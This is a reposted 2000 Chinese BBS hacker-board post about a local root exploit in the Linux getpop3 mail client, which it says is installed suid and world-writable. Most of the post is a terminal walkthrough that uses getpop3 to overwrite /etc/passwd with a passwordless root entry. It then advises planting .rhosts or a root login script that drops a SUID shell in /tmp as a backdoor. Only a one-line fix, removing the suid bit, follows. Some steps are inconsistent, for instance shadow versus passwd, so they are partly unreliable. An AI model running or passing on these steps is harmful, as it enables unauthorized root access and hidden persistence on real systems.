荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: bstone (???????????????????????????????????????), 信区: Hacker
标  题: [转载] Linux下的getpop3程序漏洞
发信站: BBS 荔园晨风站 (Sun May 28 23:01:23 2000), 转信

【 以下文字转载自 bstone 的信箱 】
【 原文由 bstone 所发表 】


Linux下的getpop3程序漏洞


漏洞发布时间:2000-03-25
漏 洞 描 述:

getpop3是linux下一个pop邮件客户端。该程序默认安装时设置了suid位,而且全
局可写。普通用户可以通过该程序的设置漏洞得到root权限。

漏洞检测方法如下:

lamebox:~$ id
uid=1000(elf) gid=100(users) groups=100(users)
lamebox:~$ cp /etc/passwd /tmp/backup
lamebox:~$ getpop3 -V
getpop3 1.08 Copyright 1997 Double Precision, Inc.

lamebox:~$ getpop3 -U /etc/passwd
enter userid: elf
enter password: mypassword
enter host:poopy.reallame666.com
querying poopy.reallame666.com
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready

Fri, 1
>USER elf
+OK Password required for elf
>PASS password
+OK elf's mailbox has 0 messages (0 octets)
>STAT
+OK 0 0
>QUIT
+OK poopy.reallame666.com POP3 server closing connection

现在/etc/shadow文件已经全局可写了。

lamebox:~$ cat /tmp/backup > /etc/passwd

下面编写/etc/passwd文件:
root:x:0:0:super admin,,,:/root:/bin/bash 原来样子
root::0:0:your daddy,,,:/root/:bin/bash 更改后
这样登陆以后就会有了root标志#
你也可以编辑.rhosts,root的.login文件等等。让他们登陆以后,自然在/tmp目
录下建立一个SUID的shell。这就是后门。

解 决 方 法:

去除该程序的suid位。




本文出自:广州京九网联


--
 Welcome to http://192.168.28.98


※ 来源:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.28.106]
--
※ 转载:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.28.98]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店